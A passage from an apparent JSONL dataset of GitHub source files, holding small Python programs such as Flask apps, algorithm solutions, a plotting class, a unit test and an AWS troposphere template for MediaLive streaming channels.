n) - 1)\n","repo_name":"simonesestili/problems-dsa","sub_path":"1879.py","file_name":"1879.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} 
+{"seq_id":"6882012901","text":"import ast\n\nfrom flask import Flask\nfrom flask import render_template\nfrom flask import request\n\nfrom search import *\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef home():\n return render_template(\"landing.html\")\n\n\n@app.route(\"/results\", methods=[\"POST\"])\ndef results():\n rawquery = request.form[\"query\"]\n query = reformquery(rawquery)\n if not query: # if the adjusted query is empty, do not continue\n return render_template(\"error.html\",\n reason=\"your query did not return any results\")\n else:\n dataframe = opendoc(\"data/database.csv\")\n twmatrix = generatesqrmatrix(dataframe)\n vectorlength = generatedveclen(twmatrix)\n dotproducts = getdotprod(query, dataframe)\n similarities = sim(dotproducts, query, vectorlength)\n results = rank(similarities)\n amountofresults = len(results)\n firstresult = results[0]\n sniplocks = getsniplocation(rawquery, results, \"test_data/\")\n snippets = getsnippet(sniplocks, \"test_data/\")\n fiveresults = list()\n for i in range(0, 5):\n fiveresults.append(results[i])\n if firstresult[1] == 0.0:\n return render_template(\n \"error.html\",\n reason=\n 'your query did not return any results. If in doubt, search \"Boeing\"',\n )\n else:\n return render_template(\n \"return.html\",\n query=rawquery,\n results=fiveresults,\n snippet=snippets,\n resultno=5,\n completeresults=results,\n amountofresults=amountofresults,\n )\n\n\n@app.route(\"/encore\", methods=[\"POST\"])\ndef encore():\n seenallresults = False\n # retrieve all form fields\n query = request.form[\"query\"]\n results = request.form[\"results\"] # represents the last rank returned\n resultno = int(request.form[\"resultno\"]) # by def. stored as string\n amountofresults = int(request.form[\"amountofresults\"])\n # The dictionaries and lists are returned as a string rather than as a list\n # or dict. 
The ast.literal_eval()-function converts this to an actual\n # function instead of a string.\n listedresults = ast.literal_eval(results)\n snippet = request.form[\"snippet\"]\n dictsnippets = ast.literal_eval(snippet)\n fiveresults = list()\n resultlimit = resultno + 5 # by default, docs are listed in the range 0-5\n if resultlimit >= amountofresults:\n # if the amount of documents exceeds the standard range, adjust the\n # range here\n resultlimit = amountofresults\n seenallresults = True # check to see if there can be more results seen\n for i in range(resultno, resultlimit):\n fiveresults.append(listedresults[i])\n return render_template(\n \"encore.html\",\n query=query,\n results=fiveresults,\n snippet=dictsnippets,\n resultno=resultlimit,\n completeresults=results,\n amountofresults=amountofresults,\n seenallresults=seenallresults,\n )\n\n\nif __name__ == \"__main__\":\n app.config[\"TEMPLATES_AUTO_RELOAD\"] = True\n app.config[\"DEBUG\"] = True\n # app.config[\"SERVER_NAME\"] = \"127.0.0.1:5000\"\n app.run()\n","repo_name":"riverbit/zoekieloekie","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"75206626926","text":"\nfrom MACE.Visualization.Styles.Subplot import SubplotStyle, default_subplot_style\nfrom MACE.Visualization.Legends import DensityLegend, CoverageLegend\nimport math\nfrom collections import OrderedDict\n\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nplt.ioff()\nfrom matplotlib.collections import PatchCollection\nfrom matplotlib.patches import Rectangle\n\n\nclass Subplot(OrderedDict):\n\n def __init__(self, track_groups=None, y_start=None, y_end=None, x_start=None, x_end=None,\n style=default_subplot_style, title=None,\n legend=None, axes=None, type=\"track\", auto_scale=False, x_scale_factor=1,\n y_scale_factor=1, figure_x_y_ratio=None,\n xmax_multiplier=1.05, ymax_multiplier=1.1,\n xmin_multiplier=0.001, ymin_multiplier=0.001):\n if track_groups:\n OrderedDict.__init__(self, track_groups)\n else:\n OrderedDict.__init__(self)\n\n self.type = type\n self.y_start = y_start\n self.y_end = y_end\n self.x_start = x_start\n self.x_end = x_end\n\n if self.type == \"track\":\n if self.y_start is None:\n self.y_start = 0\n if self.x_start is None:\n self.x_start = 0\n if self.x_end is None:\n self.x_end = 1\n\n self.style = style\n self.title = title\n self.legend = legend\n self.axes = axes\n\n # TODO: add autoscale implementation\n #self.auto_scale = auto_scale\n self.x_scale_factor = x_scale_factor\n self.y_scale_factor = y_scale_factor\n self.x_y_ratio = None\n self.figure_x_y_ratio = figure_x_y_ratio\n\n self.xmax_multiplier = xmax_multiplier\n self.ymax_multiplier = ymax_multiplier\n\n self.xmin_multiplier = xmin_multiplier\n self.ymin_multiplier = ymin_multiplier\n\n def init_coordinates(self):\n if self.type == \"track\":\n y = self.y_start + self.style.internal_offset - self.style.distance\n\n for track_group_name in self:\n\n self[track_group_name].y_start = y + self.style.distance\n self[track_group_name].init_coordinates()\n y = self[track_group_name].y_end\n self.x_end = max(self.x_end, self[track_group_name].x_end)\n\n self.x_end = self.x_end * self.style.x_multiplier\n self.y_end = (y + self.style.internal_offset) * self.style.y_multiplier\n\n #if self.auto_scale:\n # self.y_scale_factor = 1\n self.x_y_ratio = self.x_end / self.y_end\n for track_group_name in self:\n 
self[track_group_name].subplot_x_y_ratio = self.x_y_ratio\n self[track_group_name].figure_x_y_ratio = self.figure_x_y_ratio\n for track_name in self[track_group_name]:\n self[track_group_name][track_name].figure_x_y_ratio = self.figure_x_y_ratio\n self[track_group_name][track_name].subplot_x_y_ratio = self.x_y_ratio\n #print(self.x_scale_factor)\n\n # TODO: rewrite coordinate calculation for legends. Create method init_coordinates in Legend class\n if isinstance(self.legend, (CoverageLegend, DensityLegend)):\n legend_height = (len(self.legend.thresholds) + 3) * self.legend.element_size\n else:\n legend_height = None\n\n if self.legend:\n self.legend.x_start = self.x_end\n\n if legend_height:\n self.legend.y_start = (self.y_end - legend_height) / 2\n else:\n self.legend.y_start = self.y_end/2\n self.legend.x_size = self.x_end / self.legend.style.x_size_denominator\n\n self.legend.init_coordinates()\n self.x_end = self.legend.x_end\n self.y_end = max(self.legend.y_end, self.y_end) if self.legend.y_end is not None else self.y_end\n\n elif self.type == \"plot\":\n pass\n\n def draw(self, axes=None):\n axes_to_use = axes if axes else self.axes if self.axes else plt.gca()\n self.axes = axes_to_use\n self.init_coordinates()\n\n for track_group in self:\n self[track_group].draw(axes=axes_to_use)\n\n #for track_group in self:\n # self[track_group].draw_borders(axes=axes_to_use)\n\n self.style.apply(x_max=self.x_end, y_max=self.y_end, axes=axes_to_use)\n\n plt.xlim(xmin=self.x_start - (self.x_end * self.xmin_multiplier), xmax=self.x_end )\n plt.ylim(ymin=self.y_start - (self.y_end * self.ymin_multiplier), ymax=self.y_end * self.ymax_multiplier)\n\n if self.title:\n plt.title(self.title, fontsize=self.style.title_fontsize, fontweight=self.style.title_fontweight)\n\n if self.legend:\n self.legend.draw()\n\n def hide(self, axes=None):\n axes_to_use = axes if axes else self.axes if self.axes else plt.gca()\n axes_to_use.set_axis_off()\n #axes_to_use.get_xaxis().set_visible(False)\n #axes_to_use.get_yaxis().set_visible(False)","repo_name":"mahajrod/MACE","sub_path":"MACE/Visualization/Subplots.py","file_name":"Subplots.py","file_ext":"py","file_size_in_byte":5102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"30836379597","text":"import unittest\nfrom main import *\n\nclass UnitTests(unittest.TestCase) :\n def test_kinetic(self) : \n for i in range(10) :\n vel = np.zeros([7,2])\n myeng = 0\n for j in range(7) : \n vel[j,0], vel[j,1] = np.random.normal(), np.random.normal()\n myeng = myeng + vel[j,0]*vel[j,0] / 2 + vel[j,1]*vel[j,1] / 2\n self.assertTrue( np.abs( kinetic(vel) - myeng )<1e-6, \"your function does not calculate the kinetic energies correctly\" )\n","repo_name":"statistical-mechanics-exercises/molecular-dynamics-4","sub_path":"testing/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"16879597050","text":"# -*- coding: utf-8 -*-\n#\n# Jesse@FDU-VTS-MIA\n# created @date: 2020/3/11\n#\nfrom typing import List\n\nclass Solution:\n def verifyPostorder(self, postorder: List[int]) -> bool:\n if not postorder or len(postorder) == 1:\n return True\n root_key = postorder[-1]\n sep = 0\n while sep < len(postorder)-1 and postorder[sep] < root_key:\n sep += 1\n left_sub = postorder[:sep]\n right_sub = postorder[sep: len(postorder)-1]\n for num in left_sub:\n if num > root_key:\n return False\n for num in 
right_sub:\n if num < root_key:\n return False\n left = self.verifyPostorder(left_sub)\n right = self.verifyPostorder(right_sub)\n return left and right\n","repo_name":"Jesse-Z/coding-practise","sub_path":"剑指offer/033 二叉搜索树的后序遍历序列.py","file_name":"033 二叉搜索树的后序遍历序列.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"35451994576","text":"# pcost.py\n\nimport csv\n\n\ndef portfolio_cost(filename):\n '''\n Computes the total cost (shares*price) of a portfolio file\n '''\n total_cost = 0.0\n\n with open(filename, 'rt') as f:\n rows = csv.reader(f)\n headers = next(rows)\n for rowno, row in enumerate(rows, start=1):\n try:\n nshares = int(row[1])\n price = float(row[2])\n total_cost += nshares * price\n # This catches errors in int() and float() conversions above\n except ValueError:\n print(f'Row {rowno}: Bad row: {row}')\n return total_cost\n\nimport sys\nif len(sys.argv) == 2:\n filename = sys.argv[1]\nelse:\n filename = '../Data/portfolio.csv'\n\ncost = portfolio_cost(filename)\nprint('Total cost:', cost)\n","repo_name":"hoodielive/pythonscripts","sub_path":"Archived/chicago/portfolio_cost.2.4.py","file_name":"portfolio_cost.2.4.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36818788866","text":"for nt in range(int(input())):\n\tn = int(input())\n\tif n==1:\n\t\tprint (0)\n\t\tcontinue\n\tc3, c2 = 0, 0\n\tm = n\n\twhile n%3==0:\n\t\tn = n//3\n\t\tc3 += 1\n\tn = m\n\twhile n%2==0:\n\t\tn = n//2\n\t\tc2 += 1\n\tif c2==c3:\n\t\tn = m\n\t\tans = 0\n\t\twhile n%6==0:\n\t\t\tn = n//6\n\t\t\tans += 1\n\t\tif n==1:\n\t\t\tprint (ans)\n\t\telse:\n\t\t\tprint (-1)\n\telif c3>c2:\n\t\tn = m\n\t\tfor i in range(c3-c2):\n\t\t\tn = n*2\n\t\tans = c3 - c2\n\t\twhile n%6==0:\n\t\t\tn = n//6\n\t\t\tans += 1\n\t\tif n==1:\n\t\t\tprint (ans)\n\t\telse:\n\t\t\tprint (-1)\n\telse:\n\t\tprint (-1)","repo_name":"Naman18055/CF-Solutions","sub_path":"Round 653/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"7066086908","text":"class FileSystem:\n\n def __init__(self):\n self.paths = {\"\": -1}\n\n def createPath(self, path: str, value: int) -> bool:\n if path in self.paths:\n return False\n path = path.split(\"/\")\n if len(path) < 2:\n return False\n if \"/\".join(path[:-1]) in self.paths:\n self.paths[\"/\".join(path)] = value\n return True\n return False\n\n def get(self, path: str) -> int:\n return self.paths.get(path, -1)\n\n\n# Your FileSystem object will be instantiated and called as such:\n# obj = FileSystem()\n# param_1 = obj.createPath(path,value)\n# param_2 = obj.get(path)","repo_name":"ziyuan-shen/leetcode_algorithm_python_solution","sub_path":"medium/ex1166.py","file_name":"ex1166.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36155348966","text":"from flask import Flask, render_template, jsonify, request\nfrom flask_cors import CORS, cross_origin\nimport os\n# from logger import App_logger\nfrom predict import predict_data\nfrom train import train_data\nimport pickle\n\n\napp = Flask(__name__)\n\n#log_writer = App_logger()\n\n@app.route('/',methods = ['GET'])\n@cross_origin()\ndef home_page():\n return render_template('index.html')\n\n\n@app.route('/train',methods = 
['GET', 'POST'])\n@cross_origin()\ndef train():\n train_data()\n return render_template('index.html')\n\n\n@app.route('/predict',methods = ['GET', 'POST'])\n@cross_origin()\ndef predict():\n\n if request.method == 'POST':\n try:\n # file_object = open(\"logs/GeneralLogs.txt\", 'a+')\n # log_writer.log(file_object, 'Start getting data from UI')\n age = float(request.form['age'])\n workclass = (request.form['workclass'])\n fnlwgt = float(request.form['fnlwgt'])\n education = (request.form['education'])\n education_num = float(request.form['education_num'])\n marital_status = (request.form['marital_status'])\n occupation = (request.form['occupation'])\n relationship = (request.form['relationship'])\n race = (request.form['race'])\n sex = (request.form['sex'])\n capital_gain = float(request.form['capital_gain'])\n capital_loss = float(request.form['capital_loss'])\n hours_per_week = float(request.form['hours_per_week'])\n native_country = (request.form['native_country'])\n\n\n # log_writer.log(file_object, 'Complete getting data from UI')\n\n mydict = {'age':age,\t'workclass':workclass,\t'fnlwgt':fnlwgt,\t'education':education,\t'education_num':education_num,\n 'marital_status':marital_status,\t'occupation':occupation,\t'relationship':relationship,\t'race':race,\n 'sex':sex, 'capital_gain':capital_gain,\t'capital_loss':capital_loss,\t'hours_per_week':hours_per_week,\n 'native_country':native_country}\n # log_writer.log(file_object, 'Passing mydict to prediction.predict_data')\n prediction = predict_data(mydict)\n if prediction == 0:\n result = '<=50K'\n else:\n result = '>50K'\n return render_template('results.html', result=result)\n except Exception as e:\n print('The Exception message is: ', e)\n return 'something is wrong'\n # return render_template('results.html')\n else:\n return render_template('index.html')\n\n\nif __name__=='__main__':\n app.run(debug=True, host='127.0.0.1', port =5001 )","repo_name":"sauravchakraborty13069/wage_classification_xgboost","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"8723210299","text":"import logging\nimport uuid\n\nimport boto3\nfrom botocore.exceptions import ClientError\nfrom troposphere import (\n Template,\n GetAtt,\n mediaconnect,\n medialive,\n Ref,\n ec2,\n Select,\n Split,\n cloudfront,\n mediapackage,\n Output,\n Join,\n mediastore,\n Tags,\n Sub,\n cloudwatch,\n)\nfrom troposphere.mediapackage import StreamSelection\n\nfrom config import settings\nfrom . 
import CloudFormationStackGeneric\nfrom .channel_defaults import audio_defaults, output_defaults, video_defaults\nfrom .channel_defaults.dashboard import get_dashboard_body\nfrom ..enums import DISTRIBUTION_ORIGIN_ENDPOINT_STARTOVER_WINDOW\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass PreviewChannel(CloudFormationStackGeneric):\n def __init__(\n self,\n description,\n channel_name,\n channel_template,\n flow_name,\n flow_obj,\n preview_mp_channel_id,\n preview_channel_id,\n preview_origin_endpoint_id,\n preview_origin_id,\n ):\n super().__init__()\n self.description = description\n self.parent_channel_name = channel_name\n self.resolution = \"SD\"\n self.channel_template = channel_template\n self.flow_obj = flow_obj\n self.flow_name = flow_name\n self.media_live_client = boto3.client(\"medialive\")\n\n self.preview_mp_channel_id = preview_mp_channel_id\n self.preview_channel_id = preview_channel_id\n self.preview_origin_endpoint_id = preview_origin_endpoint_id\n self.preview_origin_id = preview_origin_id\n\n self.template = self.create_template()\n\n @property\n def channel_name(self):\n input_name = self.flow_name.replace(\"-\", \"\")\n return f\"{input_name}Preview\"\n\n def create_template(self):\n template = self.channel_template\n codec = \"AVC\"\n max_avc_bitrate = \"MAX_20_MBPS\"\n role_arn = f\"arn:aws:iam::{settings.AWS_ACCOUNT_NUMBER}:role/MediaLiveAccessRole\"\n\n preview_video_output = [\n output_defaults.output_preview,\n ]\n preview_video_descriptions = [\n video_defaults.video_description_preview,\n ]\n\n preview_audio_descriptions = [audio_defaults.audio_preview]\n\n mp_channel_preview = template.add_resource(\n # Create MediaPackage Channel\n mediapackage.Channel(\n self.channel_name,\n Id=self.preview_mp_channel_id,\n )\n )\n\n preview_media_live_input = template.add_resource(\n medialive.Input(\n f\"{self.channel_name}MediaLiveInput\",\n MediaConnectFlows=[\n medialive.MediaConnectFlowRequest(\n FlowArn=GetAtt(self.flow_obj, \"FlowArn\"),\n ),\n ],\n Name=f\"{self.channel_name}i\",\n RoleArn=role_arn,\n Tags={\n \"Key\": \"Channel\",\n \"Value\": self.channel_name,\n },\n Type=\"MEDIACONNECT\",\n DependsOn=[\n self.flow_obj,\n ],\n )\n )\n\n preview_input_attachment = medialive.InputAttachment(\n InputAttachmentName=Ref(preview_media_live_input),\n InputId=Ref(preview_media_live_input),\n InputSettings=medialive.InputSettings(\n DeblockFilter=\"DISABLED\",\n DenoiseFilter=\"DISABLED\",\n FilterStrength=1,\n InputFilter=\"AUTO\",\n Smpte2038DataPreference=\"IGNORE\",\n SourceEndBehavior=\"CONTINUE\",\n ),\n )\n\n channel_preview_destination = medialive.OutputDestination(\n Id=\"destinationPreview\",\n MediaPackageSettings=[\n medialive.MediaPackageOutputDestinationSettings(\n ChannelId=self.preview_channel_id,\n ),\n ],\n )\n\n mp_preview_endpoint = template.add_resource(\n # Create an origin endpoint that Cloudfront can use\n mediapackage.OriginEndpoint(\n f\"{self.flow_name}EndpointPreview\",\n Id=self.preview_origin_endpoint_id,\n ChannelId=self.preview_mp_channel_id,\n DependsOn=mp_channel_preview.title,\n HlsPackage=mediapackage.OriginEndpointHlsPackage(\n StreamSelection=StreamSelection(\n StreamOrder=\"VIDEO_BITRATE_DESCENDING\"\n )\n ),\n StartoverWindowSeconds=DISTRIBUTION_ORIGIN_ENDPOINT_STARTOVER_WINDOW,\n )\n )\n\n destination_preview = Select(2, Split(\"/\", GetAtt(mp_preview_endpoint, \"Url\")))\n\n mp_preview_distribution = template.add_resource(\n # Create Cloudfront Distribution\n cloudfront.Distribution(\n f\"{self.channel_name}Distribution\",\n 
DistributionConfig=cloudfront.DistributionConfig(\n Origins=[\n cloudfront.Origin(\n # Create new origin that Cloudfront can use\n Id=self.preview_origin_id,\n DomainName=destination_preview,\n CustomOriginConfig=cloudfront.CustomOriginConfig(OriginProtocolPolicy=\"match-viewer\"),\n ),\n ],\n DefaultCacheBehavior=cloudfront.DefaultCacheBehavior(\n TargetOriginId=self.preview_origin_id,\n ForwardedValues=cloudfront.ForwardedValues(QueryString=False),\n ViewerProtocolPolicy=\"allow-all\",\n ),\n Enabled=True,\n HttpVersion=\"http2\",\n ),\n Tags=[\n {\n \"Key\": \"Channel\",\n \"Value\": self.parent_channel_name,\n },\n {\n \"Key\": \"Input\",\n \"Value\": self.flow_name,\n },\n {\n \"Key\": \"mediapackage:cloudfront_assoc\",\n \"Value\": GetAtt(mp_channel_preview, \"Arn\"),\n },\n ],\n )\n )\n\n preview_output_group = medialive.OutputGroup(\n Name=f\"{self.resolution}_preview\",\n OutputGroupSettings=medialive.OutputGroupSettings(\n MediaPackageGroupSettings=medialive.MediaPackageGroupSettings(\n Destination=medialive.OutputLocationRef(DestinationRefId=\"destinationPreview\")\n )\n ),\n Outputs=preview_video_output,\n )\n\n preview_channel = template.add_resource(\n medialive.Channel(\n f\"{self.channel_name}mlc\",\n Name=f\"{self.channel_name}\",\n ChannelClass=\"SINGLE_PIPELINE\",\n Destinations=[channel_preview_destination],\n EncoderSettings=medialive.EncoderSettings(\n AudioDescriptions=preview_audio_descriptions,\n OutputGroups=[preview_output_group],\n VideoDescriptions=preview_video_descriptions,\n TimecodeConfig=medialive.TimecodeConfig(\n Source=\"SYSTEMCLOCK\",\n ),\n ),\n InputAttachments=[preview_input_attachment],\n InputSpecification=medialive.InputSpecification(\n Codec=codec,\n MaximumBitrate=max_avc_bitrate,\n Resolution=self.resolution,\n ),\n LogLevel=\"DISABLED\",\n RoleArn=role_arn,\n DependsOn=[\n mp_preview_distribution,\n ],\n Tags={\n \"Key\": \"Channel\",\n \"Value\": self.parent_channel_name,\n },\n )\n )\n\n template.add_output(\n [\n Output(f\"{self.flow_name}ChannelPreviewArn\", Value=GetAtt(preview_channel, \"Arn\")),\n Output(f\"{self.flow_name}DistributionPreviewUrl\", Value=GetAtt(mp_preview_endpoint, \"Url\")),\n ]\n )\n\n return template\n\n\nclass MediaLiveChannel(CloudFormationStackGeneric):\n \"\"\"\n Create a MediaLive Channel\n \"\"\"\n\n def __init__(\n self,\n description,\n channel_name,\n mp_channel_id,\n origin_endpoint_id,\n origin_id,\n preview_mp_channel_id,\n preview_channel_id,\n preview_origin_endpoint_id,\n preview_origin_id,\n resolution=\"HD\",\n ):\n super().__init__()\n self.description = description\n self.stack_name = channel_name\n self.resolution = resolution\n self.mp_channel_id = mp_channel_id\n self.origin_endpoint_id = origin_endpoint_id\n self.origin_id = origin_id\n\n self.preview_mp_channel_id = preview_mp_channel_id\n self.preview_channel_id = preview_channel_id\n self.preview_origin_endpoint_id = preview_origin_endpoint_id\n self.preview_origin_id = preview_origin_id\n\n self.media_live_client = boto3.client(\"medialive\")\n\n self.template = self.create_template()\n\n @property\n def channel_name(self):\n return self.stack_name.replace(\"-\", \"\")\n\n @property\n def is_uhd(self):\n if self.resolution not in [\"UHD\", \"HD\"]:\n raise ValueError(f\"{self.resolution} is not a valid resolution\")\n return self.resolution == \"UHD\"\n\n def create_template(self):\n template = Template()\n template.set_description(self.description)\n\n role_arn = f\"arn:aws:iam::{settings.AWS_ACCOUNT_NUMBER}:role/MediaLiveAccessRole\"\n 
codec = \"AVC\"\n max_bitrate = 200000000\n\n if self.is_uhd:\n max_avc_bitrate = \"MAX_50_MBPS\"\n else:\n max_avc_bitrate = \"MAX_20_MBPS\"\n\n ingest_port = 2000\n whitelist_cidr = \"0.0.0.0/0\"\n\n ms_container = template.add_resource(\n mediastore.Container(\n f\"MSC{self.channel_name}\",\n ContainerName=f\"MSC{self.channel_name}\",\n AccessLoggingEnabled=True,\n Tags=Tags(\n Key=\"Channel\",\n Value=self.channel_name,\n ),\n DeletionPolicy=\"Retain\",\n )\n )\n\n mp_channel = template.add_resource(\n # Create MediaPackage Channel\n mediapackage.Channel(\n self.channel_name,\n Id=self.mp_channel_id,\n )\n )\n\n mp_endpoint_1 = template.add_resource(\n # Create an origin endpoint that Cloudfront can use\n mediapackage.OriginEndpoint(\n f\"{self.channel_name}Endpoint1\",\n Id=self.origin_endpoint_id,\n ChannelId=self.mp_channel_id,\n DependsOn=mp_channel.title,\n HlsPackage=mediapackage.OriginEndpointHlsPackage(\n StreamSelection=StreamSelection(\n StreamOrder=\"VIDEO_BITRATE_DESCENDING\"\n ),\n ),\n StartoverWindowSeconds=DISTRIBUTION_ORIGIN_ENDPOINT_STARTOVER_WINDOW,\n )\n )\n\n destination1 = Select(2, Split(\"/\", GetAtt(mp_endpoint_1, \"Url\")))\n\n mp_distribution_1 = template.add_resource(\n # Create Cloudfront Distribution\n cloudfront.Distribution(\n f\"{self.channel_name}Distribution1\",\n DistributionConfig=cloudfront.DistributionConfig(\n Origins=[\n cloudfront.Origin(\n # Create new origin that Cloudfront can use\n Id=self.origin_id,\n DomainName=destination1,\n CustomOriginConfig=cloudfront.CustomOriginConfig(OriginProtocolPolicy=\"match-viewer\"),\n ),\n ],\n DefaultCacheBehavior=cloudfront.DefaultCacheBehavior(\n TargetOriginId=self.origin_id,\n ForwardedValues=cloudfront.ForwardedValues(QueryString=False),\n ViewerProtocolPolicy=\"allow-all\",\n ),\n Enabled=True,\n HttpVersion=\"http2\",\n ),\n Tags=[\n {\n \"Key\": \"Channel\",\n \"Value\": self.channel_name,\n },\n {\n \"Key\": \"mediapackage:cloudfront_assoc\",\n \"Value\": GetAtt(mp_channel, \"Arn\"),\n },\n ],\n )\n )\n\n ec2_vpc_1 = template.add_resource(\n ec2.VPC(\n f\"{self.channel_name}vpc\",\n CidrBlock=\"10.1.2.0/24\",\n EnableDnsSupport=True,\n EnableDnsHostnames=False,\n InstanceTenancy=\"default\",\n Tags=[\n {\n \"Key\": \"Name\",\n \"Value\": f\"{self.channel_name}vpc\",\n },\n {\n \"Key\": \"Channel\",\n \"Value\": self.channel_name,\n },\n ],\n )\n )\n\n ec2_vpc_1_subnet_a = template.add_resource(\n ec2.Subnet(\n f\"{self.channel_name}subneta\",\n AvailabilityZone=\"us-east-1a\",\n CidrBlock=\"10.1.2.0/28\",\n VpcId=Ref(ec2_vpc_1),\n MapPublicIpOnLaunch=False,\n Tags=[\n {\n \"Key\": \"Name\",\n \"Value\": f\"{self.channel_name}a\",\n },\n {\n \"Key\": \"Channel\",\n \"Value\": self.channel_name,\n },\n ],\n )\n )\n\n media_connect_flow_1 = template.add_resource(\n mediaconnect.Flow(\n f\"{self.channel_name}flow1\",\n Name=f\"{self.channel_name}flow1\",\n Source=mediaconnect.Source(\n Name=f\"{self.channel_name}flow1s\",\n Description=f\"{self.channel_name}flow1s\",\n IngestPort=ingest_port,\n MaxBitrate=max_bitrate,\n WhitelistCidr=whitelist_cidr,\n Protocol=\"srt-listener\",\n ),\n AvailabilityZone=GetAtt(ec2_vpc_1_subnet_a, \"AvailabilityZone\"),\n )\n )\n\n media_live_input = template.add_resource(\n medialive.Input(\n f\"{self.channel_name}MediaLiveInput\",\n MediaConnectFlows=[\n medialive.MediaConnectFlowRequest(\n FlowArn=GetAtt(media_connect_flow_1, \"FlowArn\"),\n ),\n ],\n Name=f\"{self.channel_name}i\",\n RoleArn=role_arn,\n Tags={\n \"Key\": \"Channel\",\n \"Value\": self.channel_name,\n 
},\n Type=\"MEDIACONNECT\",\n DependsOn=[\n media_connect_flow_1,\n ],\n )\n )\n\n audio_descriptions = [\n audio_defaults.audio_1,\n audio_defaults.audio_2,\n audio_defaults.audio_3,\n audio_defaults.audio_4,\n audio_defaults.audio_2eac3,\n ]\n output_list = [\n output_defaults.output1080p,\n output_defaults.output720p,\n output_defaults.output480p,\n output_defaults.output240p,\n ]\n mediastore_output_list = [output_defaults.mediastore_output1080p]\n\n video_descriptions = [\n video_defaults.video_description_1080p,\n video_defaults.video_description_720p,\n video_defaults.video_description_480p,\n video_defaults.video_description_240p,\n ]\n mediastore_descriptions = [video_defaults.mediastore_video_description_1080p]\n\n if self.is_uhd:\n # Append the audio_2eac3 settings\n audio_descriptions += [audio_defaults.audio_1eac3]\n\n # prepend 2160p to the outputs/descriptions\n output_list = [output_defaults.output2160p] + output_list\n mediastore_output_list = [output_defaults.mediastore_output2160p] + mediastore_output_list\n mediastore_descriptions = [video_defaults.mediastore_video_description_2160p] + mediastore_descriptions\n video_descriptions = [video_defaults.video_description_2160p] + video_descriptions\n\n channel_destination = medialive.OutputDestination(\n Id=\"destination1\",\n MediaPackageSettings=[\n medialive.MediaPackageOutputDestinationSettings(\n ChannelId=self.mp_channel_id,\n ),\n ],\n )\n\n mediastore_destination = medialive.OutputDestination(\n Id=\"mediaStoredestination1\",\n Settings=[\n medialive.OutputDestinationSettings(\n Url=Sub(\n \"mediastoressl://${EndpointSansProtocol}/out/index\",\n {\n \"EndpointSansProtocol\": Select(\n 1,\n Split(\"://\", GetAtt(ms_container, \"Endpoint\")),\n ),\n },\n ),\n ),\n ],\n )\n\n ms_output_group = medialive.OutputGroup(\n Name=\"MediaStore\",\n OutputGroupSettings=medialive.OutputGroupSettings(\n HlsGroupSettings=medialive.HlsGroupSettings(\n HlsCdnSettings=medialive.HlsCdnSettings(\n HlsMediaStoreSettings=medialive.HlsMediaStoreSettings(\n MediaStoreStorageClass=\"TEMPORAL\",\n NumRetries=10,\n ConnectionRetryInterval=1,\n RestartDelay=15,\n FilecacheDuration=300,\n ),\n ),\n InputLossAction=\"EMIT_OUTPUT\",\n Mode=\"LIVE\",\n Destination=medialive.OutputLocationRef(DestinationRefId=\"mediaStoredestination1\"),\n )\n ),\n Outputs=mediastore_output_list,\n )\n\n output_group = medialive.OutputGroup(\n Name=self.resolution,\n OutputGroupSettings=medialive.OutputGroupSettings(\n MediaPackageGroupSettings=medialive.MediaPackageGroupSettings(\n Destination=medialive.OutputLocationRef(DestinationRefId=\"destination1\")\n )\n ),\n Outputs=output_list,\n )\n\n input_attachment = medialive.InputAttachment(\n InputAttachmentName=Ref(media_live_input),\n InputId=Ref(media_live_input),\n InputSettings=medialive.InputSettings(\n DeblockFilter=\"DISABLED\",\n DenoiseFilter=\"DISABLED\",\n FilterStrength=1,\n InputFilter=\"AUTO\",\n Smpte2038DataPreference=\"IGNORE\",\n SourceEndBehavior=\"CONTINUE\",\n ),\n )\n\n media_live_channel = template.add_resource(\n medialive.Channel(\n f\"{self.channel_name}MediaLiveChannel\",\n Name=f\"{self.channel_name}\",\n ChannelClass=\"SINGLE_PIPELINE\",\n Destinations=[channel_destination, mediastore_destination],\n EncoderSettings=medialive.EncoderSettings(\n AudioDescriptions=audio_descriptions,\n OutputGroups=[output_group, ms_output_group],\n VideoDescriptions=video_descriptions + mediastore_descriptions,\n TimecodeConfig=medialive.TimecodeConfig(\n Source=\"SYSTEMCLOCK\",\n ),\n ),\n 
